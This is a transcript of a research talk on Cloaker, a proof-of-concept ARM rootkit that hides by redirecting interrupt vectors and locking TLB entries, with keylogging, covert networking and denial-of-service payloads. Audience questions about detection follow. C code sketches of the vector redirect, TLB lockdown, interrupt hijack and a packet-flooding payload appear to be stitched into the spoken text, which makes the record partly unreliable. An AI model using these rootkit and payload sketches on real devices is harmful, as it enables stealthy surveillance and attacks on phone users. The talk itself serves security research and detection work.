>> Helen Wang: Good morning, everyone.
It's my pleasure to introduce Francis David. Francis David is a Ph.D. candidate from the University of Illinois at Urbana-Champaign.
You're supposed to get your Ph.D. in August sometime?
So he's interviewing with the security part of the distributed systems and security group, and he's going to tell us about some of his work on how to exploit hardware features to undermine software security.
>> Francis David: Thank you, Helen.
Good morning.
And like Helen said, I'm going to talk to you about how some hardware features can actually
undermine system security.
And none of us can deny that there's been rapid growth in hardware technology.
There's been real progress from single-core CPUs to the multi-core CPUs of today.
There's the GPUs, and computers have gone from 10 million transistors to a hundredfold increase in that number.
And there's been work on even doing general computation on these GPUs now. So there's lots of cores and more features.
There's lots of complexity. And a lot of this is configurable, and all of this gives you tremendous opportunity. There's a lot of opportunity to build really interesting systems.
But there's also a huge opportunity here for malware, since this complex hardware has significant state information, there are so many configuration settings, and it's highly configurable.
There's lots of debug features that are left in the hardware, and there's lots of unused
functionality as well. So if you take a typical cell phone, the actual hardware in the cell phone
supports a lot of functionality.
And there's many timers, there's lots of specialized features on the phone which most operating
systems don't end up using.
The operating systems tend to be general-purpose operating systems. So if you take Linux, for example, it doesn't really exploit every single feature that's on these mobile phones.
So there's lots of unused functionality.
There's also unexpected behavior of hardware. Sometimes the hardware behaves in ways that
you don't really expect.
So what I'm going to talk to you about today is two different tools, essentially proof-of-concept attacks, which demonstrate that hardware features and behavior can actually be exploited in order to build malware.
And the two projects I'm going to talk to you about are Cloaker, which essentially exploits
hardware features in order to provide a malicious rootkit environment, and the other thing I'm
going to talk about is BootJacker, which essentially exploits memory preservation, DRAM
memory preservation, in order to break into a system.
And that essentially brings us to the outline of today's talk.
It's a long talk, so I'm going to spend most of my time on the Cloaker rootkit work, and I'm going
to give you a brief overview of the BootJacker work before concluding and talking about some
other topics.
So let's start with Cloaker. And I'm not going to take complete credit for the whole thing. This was definitely joint work. The paper would not have been possible without my colleagues at the university: Ellick, Jeff, and my advisor, Professor Campbell.
And what we are looking at here is rootkits. And to put the notion of rootkits into the right
perspective, I have this picture here that essentially shows you a typical attack scenario.
So the attacker first has to break into the system, essentially exploit some sort of design flaw or
an implementation flaw or like just brute-force password cracking or social engineering attacks
just to gain access to the system.
Then the next stage is somehow maintaining control over the system. And that's where the rootkit comes in. So the attacker removes all the traces of the break-in and inserts the rootkit. And that's going to be kind of the main focus of today's talk on the Cloaker part of it.
And the rootkit essentially provides a platform in some sense for performing malicious activity,
and that's stealing passwords, financial information, or running bots for spam or just using it as
another platform to attack others.
So I'm not going to really talk about a vulnerability in the system that an attacker is going to use to break in. I'm assuming there's going to be some vulnerability, and, I mean, it's well known that on lots of different platforms today there's always some vulnerability.
The iPhone was broken into. Linux (inaudible) broken into. So I'm not going to talk about how to
break into the phone, but I'll talk about how to maintain surreptitious control.
So in order to put this rootkit that we built into perspective, there's lots of other folks who have
been researching rootkits and malware.
And rootkits initially started off being user-mode applications. So there were these user-mode binaries that would replace system files on your computer. On a Linux system, for example, the program that displays the process list would be replaced by another binary which would hide a malicious process.
And then rootkits moved on to being kernel mode when system defenders, essentially, and
security researchers started figuring out ways to detect user-mode rootkits and so on.
There's been stages of development. And all of this has essentially been driven by advances in
detection technology.
So there's this continual struggle between the good guys and the bad guys, and so that kind of
drives this evolution. And let's look at each of those stages in a little bit more detail.
The user-mode rootkits, like I said, essentially are modifications to user programs. And when such rootkits were found in the wild, the detection techniques that people came up with were essentially to ensure that the integrity of the system files is preserved, and so they built integrity checkers.
And there's also, like, traditional antivirus signature checking type of tools as well which check for
malware signatures in various files of the system. So once there were easy detection techniques
for user-mode rootkits, the malware guys resorted to kernel-mode rootkits where they would
insert kernel modules, modify the kernel in various ways.
And there are two distinct categorizations of such kernel-mode rootkits as well. So one class of
such rootkits modifies kernel code. And these are kind of easy to detect. Again, you can just use
the same signature integrity check kind of ideas and apply them to the kernel space.
And the other type of kernel mode rootkits manipulates kernel data, and these are more insidious.
So they would essentially manipulate some state, dynamic state, in the kernel, and detecting
these by integrity or signature checks isn't sufficient.
So researchers came up with lots of anomaly checkers which check for odd behavior in the
system, so looking at the system from two different perspectives, for example, a high-level view
and a low-level view, and seeing if they match, so studying and trying to extract some anomalous
behavior of the system. And they were pretty successful at that.
Modern anomaly detection techniques essentially, they've shown that they can detect a lot of
these existing kernel-mode rootkits that are out there.
So the next step. Firmware rootkits were proposed a couple of years ago, and essentially they work in the same way as kernel-mode rootkits during normal operation. The firmware aspect of it is just for persistence, so that they can remain in the system through a power-cycle operation.
And this is essentially done by white hat researchers, and they essentially show that you could have such rootkits that reside in the BIOS of the system, the ACPI or the PCI BIOS, and so on.
And then Sam King pioneered the work on virtualization-based rootkits here at Microsoft Research, in fact, and the idea there is to run the rootkit, the malware, at a layer lower than
everything else that's running in the system. So you move the whole rootkit to the virtual machine
monitor and run the rest of the system as a virtual machine.
And people have argued that maybe such rootkits aren't that big of a deal because, I mean, there
are techniques that one can employ just to check for the fact whether or not you're running in a
virtualized environment, and that would hopefully kind of indicate that there's something wrong in
the system.
So maybe detection of virtual-machine-based rootkits just really reduces to the problem of detecting if you're running in a virtualized environment.
And like I said, SubVirt is one of those rootkits. Blue Pill is another rootkit that uses AMD's hardware virtualization support.
And to be fair, only those first two types of rootkits have been seen in the wild today. Firmware rootkits, virtual-machine-based rootkits, and what I'm going to talk about are all completely the work of white hat researchers.
You know how people always say that you have to be one step ahead of the bad guys? Right now we're three steps ahead of the bad guys. So that should be good, right?
So what I want to talk to you about today in the Cloaker work is a hardware-supported rootkit which essentially operates similar to a virtual-machine-based rootkit in the sense that there are no modifications that are done to the OS or the applications.
And the way it survives is by only modifying hardware state and settings. So it manipulates all these register settings and flips hardware bits, and so on, in order to survive.
And since there's absolutely no dependence here on any of the host OS services, it has to provide its own environment for malware, and by essentially divorcing itself from the rest of the operating system it can totally evade any signature checkers or integrity checkers or anomaly checkers that only look at the operating system. So in some sense such rootkits essentially exist in a parallel world from the operating system.
And that brings us to how do we build such rootkits. So Cloaker, which I'm going to talk about
today, is built for Linux on the ARM platform. And like I said, it has to provide its own mini OS
environment, essentially, for running malware. And I'm going to talk about a couple of malware
payloads later on. And the services that Cloaker provides are, like a typical operating system, it
has memory management support, interrupt management, and it has even networking support.
And Cloaker is a non-persistent rootkit. Since we're talking about a phone here, we argue that having a non-persistent rootkit on the phone is fine because people rarely let their phones die from a loss of battery power; people usually keep them charged.
But for persistence we would have to modify some part of the system, which opens us up to detection.
You had a question?
>>: You said that this will not be detectable by anomaly detection?
>> Francis David: Yes.
>>: So will it slow down the execution of the, I guess think of it as primary OS on the phone in
any way?
>> Francis David: So the way we designed our current rootkit, it does slow down the execution of the primary OS a little bit. And I'll show you a slide later on that shows the amount of the slowdown.
But there's ways to bypass that as well. And we discussed that aspect of it, and it boils down to the notion of -- there are two things you can do. One is, how do you actually measure time? If the time source is a local timer on the system, the rootkit can modify the time source. If it's something like an instruction counter, that can be modified as well, so the rootkit can come up with counter-defenses.
The other thing that we've been also discussing is since this is a cell phone system, it has to have
power management.
So we came up with the notion of essentially running the rootkit just when the OS is going to
sleep.
So at that point, by definition, nothing else should be running on the system. So there should be no other software monitoring tool running, and the rootkit can actually run while the system is sleeping, in some sense.
So there are other approaches to countering that problem, and I will talk about that later on as
well.
Another question?
>>: (Inaudible).
>> Francis David: Oh, you can have -- if you have another question.
>>: With both of those answers, I find them unsatisfying. With the first one you said -- or maybe it was the second one -- running while powered down. Then you're trading off the battery resource; you're consuming more battery. With the first one -- of virtualizing time -- that assumes that you're not dealing with somebody who can have access to the network as part of their detection code. So both of these seem like saying I'm going to assume that I get to take the last step in this game rather than my opponent.
>> Francis David: Yeah, you're right. So the question -- I mean the point is, it's like a continual
battle here. So if the good guys come up with a particular solution, the bad guys come up with a
counter solution. And that's what you're talking about here, right?
>>: Well, once I take -- will I get to take the next step?
>> Francis David: In some sense, yes. So if you have the last say in it, then maybe. And -- yeah. Yes.
>>: But if the person creating the rootkit has the last say, it always has --
>> Francis David: That's always the usual case as well, because --
>>: In that case, I don't think that's a worthwhile assumption, because if you make that assumption, I can find out what the code is that is supposed to be doing the detection and just make sure it always returns no rootkit. Because if you set up the game such that the attacker has the last move, the attacker then knows what the checker software is and can just modify the checker code to miss your rootkit.
>> Francis David: Oh, but the checker software could also be protected by hardware, and it may not be easily modifiable. So you're even talking about scenarios here where the checker software is -- I mean, you have a complete root of trust right from the hardware to the checker software. If the checker software is only checking the integrity or signatures in the OS, it's still not going to be able to find our rootkit.
And in cases where the rootkit would modify the OS, if the root of trust is from the hardware, the checker software cannot be subverted.
So do you see what I'm saying? If the checker software has been authenticated from the hardware, it cannot be subverted, even if the rootkit were running in the OS.
>>: (Inaudible)
>> Francis David: So I was talking about ARM all this while, and essentially the reason we looked at ARM was because ARM powers a lot of mobile devices today. And it's not just cell phones. It also powers GPS devices, Ford's Fusion system, and so on, and there's going to be an explosive growth in such devices.
Yes?
>>: (Inaudible)
>> Francis David: So by nature of such -- I mean the design of such rootkits is very tied to the
hardware, because I'm talking about hardware features, and our particular rootkit is tied to the
ARM platform.
>>: (Inaudible) I mean are the things that you exploit specific to the ARM processor and not, say,
intel (phonetic)?
>> Francis David: Yes. Almost. There could be similar parallels in other architectures, but
certain things that we exploit are very ARM specific.
What we're trying to do here is essentially to bring out this notion of a class of new malware which
is hardware supported, and this is just one instance. And I'll show you another example later on
as well. But we're kind of trying to bring out this notion of the existence of this different class.
So like I said, there's going to be a whole number of such devices on the market. Analysts say there are going to be 4 billion cell phone subscriptions in a couple of years. And that's almost one phone for every two people on the planet.
And in contrast, the number of PCs is just going to be like one fourth of that. So it's a platform
that has tremendous impact. And it's not just mobile devices and cell phones. A lot of consumer
electronics, toys even, use this processor.
So the reason I have this slide is that it shows that the domain we're targeting is significant.
I think I probably skipped over a slide, but what we're looking at here is essentially a slide that
shows how our rootkit operates.
There's essentially two things our rootkit exploits, one of which is flipping a bit to redirect
interrupts.
And the way this works is that on the ARM platform, on the ARM9, there are two different locations at which the interrupt vector can reside: at the zero address or at this high address here.
And a bit in a processor configuration register determines where the interrupts get dispatched. Typical operating systems like Linux, or a couple of other ARM-based operating systems we looked at, relocate the interrupt vector to the high address so that they can map this low address to a null page, which helps in debugging: a null-pointer dereference faults, so during development they can easily catch it and fix it.
So they always map the zero page to a null page and they have the interrupt vector up there.
So what Cloaker does is it first flips that bit the other way so that interrupts start getting sent back
to the low address.
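To make that bit flip concrete, here is a minimal sketch (my illustration, not the actual Cloaker source) of redirecting the vectors on an ARM9 by clearing the V bit, bit 13 of the CP15 c1 control register, which selects between the 0x00000000 and 0xFFFF0000 vector bases:

```c
/* Sketch: send exception vectors back to address 0 on an ARM9 by clearing
 * the V bit (bit 13) of the CP15 c1 control register. Illustrative only,
 * not the Cloaker source; must execute in a privileged mode. */
static inline void redirect_vectors_to_low(void)
{
    unsigned long ctrl;
    __asm__ volatile("mrc p15, 0, %0, c1, c0, 0" : "=r"(ctrl));  /* read control register */
    ctrl &= ~(1UL << 13);                                        /* V = 0: vectors at 0x00000000 */
    __asm__ volatile("mcr p15, 0, %0, c1, c0, 0" : : "r"(ctrl)); /* write it back */
}
```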
And now the other question is how does Cloaker manage to get that page mapped in without
modifying the OS page tables?
And the way Cloaker does that is it inserts a locked TLB entry. And this is a feature that's on the
ARM processor, to answer your question.
And so it inserts a locked TLB entry which the OS has no way to even go and read. The ARM
doesn't provide support for the OS to go read these TLB entries even. And this locked TLB entry
can essentially map in arbitrary regions of the physical address space into virtual memory, so
these addresses are virtual memory addresses.
And what happens here is that now that Cloaker flips this bit and inserts a mapping for the zero page, it can go put an interrupt vector at that zero page to redirect interrupts to itself.
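The TLB locking step might look roughly like this; the CP15 c10 lockdown encoding below follows my reading of the ARM926EJ-S manual, so treat the field positions and the exact sequencing as assumptions to be checked against the TRM:

```c
/* Sketch: pin a data-TLB entry for the zero page in the ARM9's dedicated
 * lockdown region so it stays mapped without touching the OS page tables.
 * Field positions (victim index, preserve bit) are assumptions from the
 * ARM926EJ-S TRM, not verified register programming. */
static void lock_zero_page_tlb_entry(unsigned victim)
{
    volatile unsigned long *mva = (volatile unsigned long *)0x0; /* zero page: the new vector base */
    unsigned long lockdown = ((unsigned long)victim << 26) | 1UL; /* victim slot, P (preserve) = 1 */
    unsigned long tmp;

    __asm__ volatile("mcr p15, 0, %0, c10, c0, 0" : : "r"(lockdown)); /* D-TLB lockdown register */
    __asm__ volatile("mcr p15, 0, %0, c8, c6, 1" : : "r"(mva));       /* invalidate D-TLB entry for MVA */
    tmp = *mva;                              /* touch the page: the table walk reloads and locks it */
    (void)tmp;
    __asm__ volatile("mcr p15, 0, %0, c10, c0, 0" : : "r"(0UL));      /* P = 0: back to normal allocation */
}
```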
And this essentially brings it down to your question where it's intercepting every single interrupt
now. And so what we do now is we don't want to slow down the system significantly.
So what we have here is, for interrupts that are time critical, like timer interrupts, we just do really quick pass-throughs to the OS. We don't interpose on the timer interrupt path. We only interpose on interrupts that are very asynchronous, like a network interrupt or a keyboard interrupt or something like that, which essentially gives you a little bit of protection against timing-based detection.
And when you run malware code on the asynchronous paths, the OS really doesn't know when to expect those interrupts. So it still just delays them by a little bit.
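A sketch of that dispatch policy, with hypothetical names for the interrupt-controller query and the payload hook (none of these identifiers come from the paper):

```c
/* Sketch of Cloaker's low-vector dispatch policy: time-critical interrupts
 * pass straight through to the OS handler at the relocated high vector;
 * asynchronous ones run a payload hook first. read_irq_source, IRQ_TIMER
 * and cloaker_payload_hook are hypothetical names. */
#define OS_IRQ_VECTOR 0xFFFF0018UL          /* IRQ slot of the OS's high vector table */
#define IRQ_TIMER     1                     /* hypothetical timer interrupt number */

extern unsigned read_irq_source(void);      /* hypothetical: ask the interrupt controller */
extern void cloaker_payload_hook(unsigned irq);

void cloaker_irq_entry(void)
{
    unsigned irq = read_irq_source();

    if (irq != IRQ_TIMER)                   /* never interpose on the timer path */
        cloaker_payload_hook(irq);          /* e.g. keylogging, packet sniffing */

    /* chain to the OS's real IRQ handler; in reality this is a direct
     * branch from the assembly vector stub, not a C function call */
    ((void (*)(void))OS_IRQ_VECTOR)();
}
```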
Yes?
>>: So you said you inserted (inaudible) TLB entry which is what prevents the system's page
table from knowing about the existence of the memory where the rootkit is running, correct?
>> Francis David: The locked TLB entry essentially avoids modification of the OS page tables.
>>: Right. But then what prevents the system from allocating a page in the area where the
rootkit is residing?
>> Francis David: Okay. So that's the next slide. I think -- I'll get to that in the next slide.
Yes?
>>: I have a question. Do you choose to inject your payload when a certain kind of interrupt happens, like a network interrupt or something?
On the other hand, have you thought about just choosing to inject your payload based on some timer you keep on the CPU? Because for most interrupts I think they just execute the critical parts with a small amount of code. So it doesn't make a difference between a packet arrival or some other thing, right? The critical part is very short. Then they just give back control. So that won't make a difference.
>> Francis David: I'm not sure I understood your question.
So are you saying that it's okay to intercept all interrupts, or --
>>: I'm saying --
>> Francis David: It's okay --
>>: (Inaudible) to inject your payload not based on the type of the interrupt but based on a pace
you keep.
>> Francis David: Oh, okay, a pace that you maintain. So that's definitely possible.
One thing that we still are able to do with our rootkit is enable any unused timers, for example,
that are on the board. And one of our payloads actually does that. And that will give you a very
controlled pace to do whatever malware work you want to do.
So it depends on how much extra new functionality is there on the system.
In our case, on our platform, the Linux kernel uses two of the system timers, and the third timer can be used for malware.
Okay. So to get back to the other question, let me just first go to the other part first.
So how do we insert this rootkit? We essentially use a kernel module for installation. And you could think of other really stealthy ways of inserting the rootkit by directly accessing physical memory through /dev/mem on Linux, but right now, for this proof of concept, we just use a kernel module where you do a module insert and a module remove, and that inserts the rootkit.
And to answer the other question, where does physical memory come from, where does the
actual rootkit reside in memory, there's several places to do this.
One is essentially to use on-chip SRAM. So on these mobile platforms there's usually a couple of kilobytes of on-chip RAM that's used for fast execution or for things like power management, and you could use that portion of memory.
Or the other thing you can use is NOR flash. I don't know if you know about this property of NOR flash, but NOR flash allows you to actually execute code off of it directly, just like you would from normal memory.
So unlike NAND flash, which has to be accessed in blocks, you can actually execute code off of NOR flash, so you can use NOR flash as memory.
The other thing you can do -- the simplest thing -- is essentially just allocate some memory inside the kernel in our module, for example, and just cause a memory leak in some sense. I mean, to the OS it just looks like a memory leak. So there's several options. We just picked the simplest one.
Does that answer your question?
Yes?
>>: (Inaudible).
>> Francis David: No. I mean, it's like a memory leak. So you can insert the module.
Okay. The next thing I'm going to talk about is the services that are provided by Cloaker.
So Cloaker isn't just the hiding mechanism and operating environment; it has to provide a couple of services. We wrote a service for dynamic memory management using the buddy memory allocation algorithm.
Eventually we discovered that we could write a lot of payloads without using dynamic memory management. So it's an optional kind of service, but it's still there.
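For flavor, here is a compressed buddy-allocator sketch of the sort of service this is (my reconstruction, with freeing and coalescing omitted; none of these names are from the Cloaker source):

```c
/* Minimal buddy-allocator sketch: one free list per power-of-two order,
 * splitting larger blocks on demand. Freeing/coalescing omitted, and
 * orders smaller than a pointer are not handled. */
#include <stddef.h>

#define MAX_ORDER 12                              /* 4 KB pool */
struct block { struct block *next; };
static struct block *free_list[MAX_ORDER + 1];
static unsigned char pool[1 << MAX_ORDER];

void buddy_init(void)
{
    free_list[MAX_ORDER] = (struct block *)pool;  /* start with one max-order block */
    free_list[MAX_ORDER]->next = NULL;
}

void *buddy_alloc(unsigned order)                 /* block size is 1 << order bytes */
{
    unsigned o = order;
    while (o <= MAX_ORDER && free_list[o] == NULL)
        o++;                                      /* smallest big-enough free block */
    if (o > MAX_ORDER)
        return NULL;
    struct block *b = free_list[o];
    free_list[o] = b->next;
    while (o > order) {                           /* split, keeping each buddy on its list */
        o--;
        struct block *buddy = (struct block *)((char *)b + (1u << o));
        buddy->next = free_list[o];
        free_list[o] = buddy;
    }
    return b;
}
```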
And we also have interrupt management support in Cloaker. It lets payloads independently enable and disable interrupts for different devices, for example, if they want to monitor a particular device. The library also supports lookup of the current interrupt numbers and allows malicious payloads to register handlers for those interrupts.
And Cloaker also has networking support. And this is not complete networking support in the sense that it doesn't have the complete TCP stack in there. It essentially lets you do IP communication. And the way we do this in Cloaker is we use a really stripped-down version of the Linux kernel's Ethernet driver.
So the intuition behind this is you don't really need code for initializing the device or tearing down
the device, a lot of these different types of functionality. All you need is a routine that lets you
send a packet and a routine that lets you receive a packet.
And you can build this really small network driver in some sense. And once you have these two mechanisms to send and receive packets, you can achieve IP networking by discovering two parameters: the gateway MAC address and the source IP address. So if you have those two parameters, then you can start sending out network packets.
And the way we discover those two parameters is pretty easy as well. Periodically we intercept some incoming network packets. We pull a packet off the network card and the OS doesn't see it, but that just looks like packet loss on the network, so it isn't really a big deal.
Yes?
>>: (Inaudible) Ethernet driver rather than just hooking the OS's?
>> Francis David: So the reason we didn't want to hook the OS's is to not modify any part of the OS. So we didn't want to -- oh, you're talking about actually using the OS code directly?
>>: (Inaudible)
>> Francis David: Yes, so that's definitely another option that we've also looked at, to just use
the code so you don't even have to have local code.
In that case we had to make some modifications so that it doesn't interact with the OS driver in weird ways. The OS driver in the Linux kernel does a bit of locking, and so on, which we can't reuse in our rootkit because it modifies OS state.
>>: (Inaudible) why you can't just hook the packets as they come up from the system into like the
IP stack or on any layer of the stack just to redirect calls inside the kernel.
>> Francis David: Oh, so -- the only thing we can do is actually go read a packet if it's in an OS
buffer. We can't really modify the OS control flow in any way because that opens you up to -- if
you have to modify control flow, then it opens you up to all those other detection techniques.
>>: (Inaudible)
>> Francis David: I didn't get your question.
>>: (Inaudible)
>> Francis David: Uh-huh.
>>: (Inaudible)
>> Francis David: So the OS can --
>>: (Inaudible)
>> Francis David: So you're right. I mean, there's one bit that we flipped, right? And if the OS
goes and checks for that bit, you can essentially detect our rootkit. That's what you're saying,
right, in some sense?
>>: Exactly.
>> Francis David: Yes. So that's definitely true.
So what I'm trying to bring out here is not that that one particular vulnerability exists. I'm saying that there's a class of such vulnerabilities. And in a couple of slides I'll show you another technique
that doesn't use that flip-bit mechanism.
So Cloaker is just a proof of concept that's trying to demonstrate that this class exists, and it's not
about this particular vulnerability. You can't place your finger on this thing and say, well, this bit is
flipped, and therefore if I go check for this, I can avoid this class of rootkits or this class of
malware.
So I'll show in a couple of slides another way to do the subversion that doesn't use that bit.
So we do get that question a lot, which is why we came up with the other alternative.
>>: (Inaudible)
>> Francis David: Can I intercept the moment when the OS reads that specific bit?
So the other attack I'm going to show you can actually let you do that. Right now we can't, because we're not interposing on any OS read operations at all. We could possibly insert a TLB entry for that -- actually, the bit manipulation is essentially a hardware instruction.
So it directly reads it off a processor configuration register, so it's very difficult to intercept that request unless you're intercepting the whole page that that instruction exists on and trying to subvert it. It's more complicated. There's an easier way to do it, and I'll show you in a minute.
Other questions?
Okay. So getting back to the IP networking part, we intercept a couple of arbitrary packets off the network. We have this packet header buffer inside Cloaker which has pre-filled-in entries for things like the destination MAC, the source MAC -- I mean, the destination MAC has to be the gateway MAC, and that needs to be figured out. The source MAC can be read from the Ethernet card. And it has the IP header fields and so on.
And the way we fill up this packet header is that once we see an intercepted packet that's coming from a different subnet, we just copy its source MAC into the destination MAC here, which is actually the gateway MAC, and we copy its destination IP address, which is our source IP address. So that way we get the source IP address.
The other alternative is to go mess with the OS structures, but this gives us a little bit of OS independence at least, and that gives you complete IP networking.
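In code, learning those two parameters from one intercepted cross-subnet frame comes down to two copies; the offsets below assume a plain Ethernet II frame carrying IPv4, and the structure is my own illustration:

```c
/* Sketch: for an inbound frame that originated on another subnet, the
 * Ethernet source MAC is the gateway's MAC and the IPv4 destination
 * address is this host's own address. Offsets assume Ethernet II + IPv4. */
#include <stdint.h>
#include <string.h>

struct egress_template {
    uint8_t  dst_mac[6];   /* gateway MAC: where every outgoing frame goes */
    uint8_t  src_mac[6];   /* read once from the Ethernet controller */
    uint32_t src_ip;       /* this host's IP, learned from inbound traffic */
};

void learn_from_frame(struct egress_template *t, const uint8_t *frame)
{
    memcpy(t->dst_mac, frame + 6, 6);        /* Ethernet source MAC field */
    memcpy(&t->src_ip, frame + 14 + 16, 4);  /* IPv4 destination address field */
}
```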
Yes?
>>: (Inaudible)
>> Francis David: You cannot (inaudible).
>>: In other words, you said that (inaudible) gateway, which means you can't attack any of the
local devices on the network now. You can only attack ones that (inaudible).
>> Francis David: Yes, you're right. So this is just a simple illustration for how you would
essentially send out information from the host. If you wanted to do something like that you could
probably implement ARP locally as well. So it's up to you how much functionality you want in the
system.
The other thing I'm going to spend some time talking about is the keylogger that we have built as
a payload for Cloaker. So these are a couple of payloads that I'm going to talk about now.
And this one intercepts input on the serial port, and this is like a typical serial port. We're considering an NS16550-style serial port that's standard on all PCs as well; they have similar things on phones.
And these serial ports work by having a FIFO buffer for transmit and another FIFO buffer for receive. The problem here is, say you want to intercept these keystrokes that are coming in on the serial port. This chip doesn't let you put back something that you just read.
So if you read from the receive FIFO, it essentially shifts all the other contents, so it's like a shift register. You read this character out and there's no way to put it back in again.
So this initially kind of led to some issues, and we were figuring out how to do this keylogging so
that the OS also still receives that character. So you don't want to read a character off and the
OS not receive it.
Yes?
>>: So for the key pad, if you want to intercept, if you want to implement (inaudible)
>> Francis David: On real phones there's a specialized bit of keypad hardware that we haven't really looked at. So this keylogger works on this prototype cell phone that we have. And on real phones I'm not sure what the exact hardware is.
>>: (Inaudible) in the serial port?
>> Francis David: Yes. So what we're doing here is going to take advantage of a weakness in
this particular chip.
>>: (Inaudible)
>> Francis David: You're right about that.
So what we're trying to do here is, again, a proof of concept as well. So we're showing that in this
particular piece of hardware there exists this vulnerability.
On the prototype hardware that we were looking at, this was the only way to get a keyboard input
into the system.
>>: In this particular case you cannot run the rootkit in sleep mode.
>> Francis David: Yes, you're right. So this has to be -- you're intercepting the keyboard input,
which means you delay the input by a little bit.
So we didn't have access to the real hardware on a phone for the keyboard. We didn't have the
specs for that component. But I'm sure there's probably some similar debug feature in that that
can be exploited.
So the way we do the serial port exploit is that we enable this debug feature on this chip which
lets you loop back the transmit lines to the receive lines. And this is used for debugging.
Essentially the way we operate now is we read all of the input that the user types in and then set
this loopback feature, write it back out and then unset that feature. So that essentially lets you
intercept input while still letting that input pass on through to the OS.
So the other possibility here is to directly find and access the OS buffer. And, again, this requires understanding the OS internals. And while it's a possibility, we just thought this was more elegant.
We wrote another couple of payloads. We wrote --
>>: (Inaudible) something comes in and you (inaudible)
>> Francis David: I'm sorry?
>>: So if I understood this, so you're going to read out of the received (inaudible) you just
loopback and send it back through.
>> Francis David: Oh, what happens to the something coming in? Oh, we're looking at human
input here. So the speed at which you can do the loopback, read out and everything is really fast.
>>: (Inaudible)
>> Francis David: So if you can type two characters within microseconds, then -- I'm not trying to say that this works for general serial port interception at the maximum rate.
>>: (Inaudible)
>> Francis David: No, in this case we essentially turn on the debug mode, loopback the input
and then turn off the debug mode. So this one you wouldn't even see.
So the other two payloads that we wrote were, first, a payload that does essentially a denial of service. It activates an unused timer, like I mentioned; there's some bit of hardware that's unused. So whenever it gets a notification, it sends out a packet using the networking support.
And the other thing we did was essentially send out the keylogger buffer as soon as it's full. As
soon as you have network packets being sent out, then you're vulnerable to network intrusion
detection systems. And we're not going to really delve into that, but essentially once you start
doing externally-visible changes, you're opening up yourself to detection.
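The rough shape of that denial-of-service payload, written against a hypothetical stand-in for Cloaker's internal API (every identifier here is mine, not from the paper):

```c
/* Sketch: claim the third (OS-unused) system timer through Cloaker's
 * interrupt service and fire a packet at a preconfigured target on every
 * tick. All names below are hypothetical stand-ins for Cloaker's API. */
extern int  cloaker_irq_lookup(const char *device);       /* e.g. "timer2" */
extern void cloaker_irq_register(int irq, void (*fn)(void));
extern void cloaker_timer_enable(int timer_id, unsigned hz);
extern void cloaker_ip_send(unsigned dst_ip, const void *buf, unsigned len);

static const unsigned ATTACK_TARGET = 0x0A000001; /* example: 10.0.0.1, preconfigured */

static void dos_tick(void)
{
    static const char junk[64] = {0};
    cloaker_ip_send(ATTACK_TARGET, junk, sizeof junk);    /* one packet per tick */
}

void dos_payload_init(void)
{
    int irq = cloaker_irq_lookup("timer2");   /* the timer Linux leaves unused */
    cloaker_irq_register(irq, dos_tick);
    cloaker_timer_enable(2, 10);              /* 10 ticks per second */
}
```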
So I'm going to now move on to the actual evaluation system, what we did.
So the whole thing was designed and built on the OMAP H2 platform. It's a Texas Instruments board; it's a prototype cell phone, essentially. And it has an ARM9 processor core. We used the latest Linux kernel. The exact version really doesn't matter, because we're kind of divorced from the OS. It can run with any Linux kernel.
And the measurements that I'm going to talk about now are, we measured the size of our rootkit.
We also looked at the performance impact on the OS, to answer your previous question.
And I'll also look at the detectability and compare existing approaches in other rootkits as well.
So for the size aspect of it, you can see that we've managed to write Cloaker in a really compact
manner. So essentially this table says that Cloaker is really, really small. You can actually have
Cloaker fit within those couple of kilobytes of SRAM, for example. And in our case we managed
to fit all of Cloaker, including its payloads, within the first eight kilobytes of memory.
And the reason for this is we don't really have to have that much device driver support. And our
payloads are simple as well. So it's a tradeoff. If you want more complexity, you get a larger
size.
But what we're trying to show here is that you can get significant levels of malware, essentially.
You're still able to send out network packets and you're still able to intercept keystrokes, and you
can now do all of that in a really compact manner.
>>: I'm curious. On the denial of service, the IP denial of service, what does that 12 lines of code look like over the network?
>> Francis David: So all it's doing is sending a packet over the network. So if you're assuming a
preconfigured attack target, there's no control component yet.
>>: (Inaudible) code that the (inaudible) the payload.
>> Francis David: Yeah.
>>: So are there 11 lines?
>> Francis David: So there's code that's essentially looking up the interrupt. I mean, the timer
interrupt comes in. So the denial of service payload essentially is a timer interrupt that comes in.
The interrupt management system processes it and gives it to you. So there's also code to
enable that initial functionality, that extra timer.
>>: I'm having a hard time figuring out, how do you possibly talk to a (inaudible) enough to get it
to send out a packet in 12 lines?
>> Francis David: The 12 lines doesn't include the actual network code. That's included inside Cloaker. So the actual network interaction, the driver --
>>: So some of those 147 lines (inaudible) network driver.
>> Francis David: Yes. So those 147 lines of code include all the services that Cloaker provides -- the networking and the interrupt processing -- and the memory management, which we listed separately.
So it's really easy -- I mean it's really small because, like I said before, you don't have to have all
the code.
And to answer your question from before, we took the Linux driver and stripped out a lot of code from it. We couldn't reuse the Linux driver directly.
Okay. So the performance question. So what does this whole thing do to performance?
So this shows a bunch of statistics that are reported by LM Bench. And you will notice that there
is a small noticeable change in performance when you're running Cloaker because it's
intercepting interrupts.
And, yes, this definitely does open it up to detection in some manner. And like I was discussing
before, it's a continual struggle here.
Yes?
>>: (Inaudible).
>> Francis David: So you're talking about something like frequency scaling? The ARM that we're looking at doesn't have any dynamic frequency scaling. But the other attack I'll show you in a minute probably also avoids this issue at some level.
So, detectability. What I have here is a big table. There's a lot of information in it, but essentially this column lists all the existing techniques that are used for rootkit detection. So you have integrity checks of the disk or of the processes, platform integrity checks, kernel integrity checks -- I'm including anomaly detectors for the kernel inside this category -- and the signature checkers.
The take-away from this slide is that the only thing that can actually detect Cloaker effectively is a complete physical memory scan that searches for its signature.
Yes?
>>: What do the VMM detectors do?
>> Francis David: The VMM detectors? So the VMM detectors essentially check for the
presence of TLB entries that are being used up in the system by the VMMs. So this was a paper
by folks from Stanford and (inaudible), and the paper was "VMM Detection, Myth Or Reality."
And --
>>: (Inaudible).
>> Francis David: So they have a whole slew of such methods that they use. And TLB sizing is
something they kind of run in order to see those TLB entries that are missing.
Yes?
>>: So with regards to non-persistence, doesn't non-persistence mean that these process integrity checkers or signature checkers should be able to find it? For user-mode non-persistence, you have these process checks?
>> Francis David: Yeah. So if you take a signature of all processes, you'll still find it, right? So it's a user-mode process. You can think of this as running a user-mode process and deleting the file, right? So it's not on the disk.
I mean, if you run an integrity check on the disk, you won't find it -- I mean a signature check on the disk -- unless it's checking all the disk blocks. If you're looking at the file system, it's not there on the file system anymore, because you deleted the file.
But if you look at the process itself, you have the process list, so it's all in user mode, and a kernel-level detector can go through all the processes and look for signatures.
Yes?
